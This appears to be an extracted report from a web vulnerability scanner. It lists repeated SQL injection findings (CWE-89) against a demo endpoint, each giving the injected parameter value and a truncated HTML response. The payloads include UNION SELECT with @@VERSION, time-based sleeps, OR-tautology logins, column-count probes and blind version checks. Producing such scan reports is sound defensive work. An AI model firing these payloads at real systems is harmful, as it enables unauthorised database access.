Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1737\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1738\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1739\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1740\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1741\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1083=1083 AND (1427=\n1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1742\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# OR x=y\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1743\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1744\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1745\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 28--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1746\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1747\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,3,1))='c'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1748\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1749\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1750\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# HAVING 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts 